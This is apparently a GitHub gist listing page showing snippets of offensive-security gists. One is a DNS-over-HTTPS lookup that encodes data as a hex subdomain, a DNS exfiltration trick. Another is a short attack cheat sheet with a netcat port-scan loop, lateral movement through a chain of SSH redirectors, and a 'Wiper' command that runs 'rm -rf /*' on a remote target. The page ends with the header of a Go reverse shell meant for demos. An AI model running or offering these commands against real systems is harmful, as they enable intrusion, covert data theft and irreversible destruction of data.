This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://dns.google.com/resolve?type=A&name=5468697320697320612074657374.example.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Port Scanning | |
for p in `jot 65535`; do | |
nc -vz TARGET $p | |
done 2>&1 | tee portscan.out | |
#Lateral Movement | |
ssh -J REDIR1,REDIR2,REDIR3,REDIR4 user@TARGET | |
#Wiper | |
ssh TARGET rm -rf /* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// demoshell is a nifty beaconing shell useful for demos | |
package main | |
/* | |
* demoshell.go | |
* Simple reverse shell used in demos | |
* By J. Stuart McMurray | |
* Created 20180331 | |
* Last Modified 20180331 | |
*/ |
NewerOlder